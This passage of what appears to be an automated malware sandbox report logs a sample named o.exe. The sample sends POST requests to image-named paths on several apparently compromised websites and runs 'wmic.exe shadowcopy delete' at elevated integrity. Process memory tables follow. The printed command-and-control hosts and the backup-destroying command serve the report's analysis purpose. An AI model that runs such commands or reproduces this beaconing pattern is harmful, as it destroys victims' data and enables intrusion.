Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = koloritplus.ru, server_port = 80 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP/1.1, target_resource = wp-content/graphic/sokazu.bmp, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = Content-Type: multipart/form-data, url = koloritplus.ru/wp-content/graphic/sokazu.bmp True 1
Fn
Data
Close Session - True 58
Fn
HTTP Session #53
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Server Name h5s.vn
Server Port 80
Data Sent 216
Data Received 3
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = h5s.vn, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP/1.1, target_resource = /, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = h5s.vn/ True 1
Fn
Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Fn
Data
HTTP Session #54
»
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Server Name h5s.vn
Server Port 80
Data Sent 241
Data Received 0
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = h5s.vn, server_port = 80 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP/1.1, target_resource = includes/imgs/rukaam.jpg, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = Content-Type: multipart/form-data, url = h5s.vn/includes/imgs/rukaam.jpg True 1
Fn
Data
Close Session - True 58
Fn
HTTP Session #55
»
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Server Name marketisleri.com
Server Port 80
Data Sent 236
Data Received 3
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = marketisleri.com, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP/1.1, target_resource = /, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = marketisleri.com/ True 1
Fn
Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Fn
Data
HTTP Session #56
»
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Server Name marketisleri.com
Server Port 443
Data Sent 263
Data Received 0
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = marketisleri.com, server_port = 443 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP/1.1, target_resource = includes/images/thkefu.gif, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = Content-Type: multipart/form-data, url = marketisleri.com/includes/images/thkefu.gif False 1
Fn
Close Session - True 58
Fn
HTTP Session #57
»
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Server Name www.toflyaviacao.com.br
Server Port 80
Data Sent 250
Data Received 3
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = www.toflyaviacao.com.br, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP/1.1, target_resource = /, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = www.toflyaviacao.com.br/ True 1
Fn
Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Fn
Data
HTTP Session #58
»
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Server Name www.toflyaviacao.com.br
Server Port 80
Data Sent 271
Data Received 0
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = www.toflyaviacao.com.br, server_port = 80 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP/1.1, target_resource = static/pics/imda.png, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = Content-Type: multipart/form-data, url = www.toflyaviacao.com.br/static/pics/imda.png True 1
Fn
Data
Close Session - True 58
Fn
HTTP Session #59
»
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Server Name www.rment.in
Server Port 80
Data Sent 228
Data Received 0
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = www.rment.in, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP/1.1, target_resource = /, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = www.rment.in/ False 1
Fn
Process #3: wmic.exe
21 0
»
Information Value
ID #3
File Name c:\windows\system32\wbem\wmic.exe
Command Line "C:\Windows\system32\wbem\wmic.exe" shadowcopy delete
Initial Working Directory C:\Users\EEBsYm5\Desktop\
Monitor Start Time: 00:03:01, Reason: Child Process
Unmonitor End Time: 00:03:42, Reason: Self Terminated
Monitor Duration 00:00:41
OS Process Information
»
Information Value
PID 0xb10
Parent PID 0x9fc (c:\users\eebsym5\desktop\o.exe)
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username CRH2YWU7\EEBsYm5
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x B14
0x B28
0x B2C
0x B30
0x B34
0x B38
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
Host Behavior
COM (6)
»
Operation Class Interface Additional Information Success Count Logfile
Create WBEMLocator IWbemLocator cls_context = CLSCTX_INPROC_SERVER True 1
Fn
Create F6D90F12-9C73-11D3-B32E-00C04F990BB4 2933BF95-7B36-11D2-B20E-00C04F983E60 cls_context = CLSCTX_INPROC_SERVER True 1
Fn
Execute WBEMLocator IWbemLocator method_name = ConnectServer, network_resource = root\cli True 1
Fn
Execute WBEMLocator IWbemLocator method_name = ConnectServer, network_resource = root\cli\ms_409 True 1
Fn
Execute WBEMLocator IWbemLocator method_name = ConnectServer, network_resource = \\CRH2YWU7\ROOT\CIMV2 True 1
Fn
Execute WBEMLocator IWbemServices method_name = ExecQuery, query_language = WQL, query = SELECT * FROM Win32_ShadowCopy True 1
Fn
Registry (5)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM - True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM value_name = Logging, data = 48 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM value_name = Logging Directory True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM value_name = Logging Directory, data = 37 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM value_name = Log File Max Size, data = 54 True 1
Fn
Module (3)
»
Operation Module Additional Information Success Count Logfile
Load C:\Windows\system32\kernel32.dll base_address = 0x76910000 True 1
Fn
Get Handle c:\windows\system32\wbem\wmic.exe base_address = 0x230000 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = SetThreadUILanguage, address_out = 0x769624c2 True 1
Fn
System (6)
»
Operation Additional Information Success Count Logfile
Get Computer Name result_out = CRH2YWU7 True 1
Fn
Get Time type = System Time, time = 2018-09-24 10:36:53 (UTC) True 1
Fn
Get Time type = Ticks, time = 191444 True 1
Fn
Get Time type = Local Time, time = 2018-09-24 08:36:54 (Local Time) True 1
Fn
Get Info type = System Directory, result_out = C:\Windows\system32 True 2
Fn
Process #11: System
0 0
»
Information Value
ID #11
File Name System
Command Line -
Initial Working Directory -
Monitor Start Time: 00:05:12, Reason: Kernel Analysis
Unmonitor End Time: 00:05:21, Reason: Terminated by Timeout
Monitor Duration 00:00:09
Remark No high level activity detected in monitored regions
OS Process Information
»
Information Value
PID 0x4
Parent PID 0xffffffffffffffff (Unknown)
Is Created or Modified Executable False
Integrity Level System (Elevated)
Username NT AUTHORITY\SYSTEM
Enabled Privileges SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege
Thread IDs
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
pagefile_0x0000000000010000 0x00010000 0x00032fff Pagefile Backed Memory rw True False False -
Process #13: smss.exe
0 0
»
Information Value
ID #13
File Name c:\windows\system32\smss.exe
Command Line \SystemRoot\System32\smss.exe
Initial Working Directory C:\Windows
Monitor Start Time: 00:05:17, Reason: Child Process
Unmonitor End Time: 00:05:21, Reason: Terminated by Timeout
Monitor Duration 00:00:04
Remark No high level activity detected in monitored regions
OS Process Information
»
Information Value
PID 0xe0
Parent PID 0x4 (System)
Is Created or Modified Executable False
Integrity Level System (Elevated)
Username NT AUTHORITY\SYSTEM
Enabled Privileges SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege
Thread IDs
0x E4
0x E8
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x (null) 0x00000000 0x000fffff Private Memory rw True False False -
private_0x0000000000100000 0x00100000 0x00100fff Private Memory rw True False False -
private_0x00000000002d0000 0x002d0000 0x0030ffff Private Memory rw True False False -
smss.exe 0x48410000 0x48422fff Memory Mapped File rwx False False False -
ntdll.dll 0x77a80000 0x77bbbfff Memory Mapped File rwx False False False -
apisetschema.dll 0x77cc0000 0x77cc0fff Memory Mapped File rwx False False False -
pagefile_0x000000007ffb0000 0x7ffb0000 0x7ffd2fff Pagefile Backed Memory r True False False -
private_0x000000007ffd9000 0x7ffd9000 0x7ffd9fff Private Memory rw True False False -
private_0x000000007ffdf000 0x7ffdf000 0x7ffdffff Private Memory rw True False False -
Process #14: autochk.exe
0 0
»
Information Value
ID #14
File Name c:\windows\system32\autochk.exe
Command Line \??\C:\Windows\system32\autochk.exe *
Initial Working Directory C:\Windows\system32
Monitor Start Time: 00:05:17, Reason: Child Process
Unmonitor End Time: 00:05:17, Reason: Self Terminated
Monitor Duration 00:00:00
Remark No high level activity detected in monitored regions
OS Process Information
»
Information Value
PID 0xec
Parent PID 0xe0 (c:\windows\system32\smss.exe)
Is Created or Modified Executable False
Integrity Level System (Elevated)
Username NT AUTHORITY\SYSTEM
Enabled Privileges SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege
Thread IDs
0x F0
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory rw True False False -
private_0x0000000000170000 0x00170000 0x001affff Private Memory rw True False False -
autochk.exe 0x00cd0000 0x00d75fff Memory Mapped File rwx False False False -
ntdll.dll 0x77a80000 0x77bbbfff Memory Mapped File rwx False False False -
apisetschema.dll 0x77cc0000 0x77cc0fff Memory Mapped File rwx False False False -
pagefile_0x000000007ffb0000 0x7ffb0000 0x7ffd2fff Pagefile Backed Memory r True False False -
private_0x000000007ffde000 0x7ffde000 0x7ffdefff Private Memory rw True False False -
private_0x000000007ffdf000 0x7ffdf000 0x7ffdffff Private Memory rw True False False -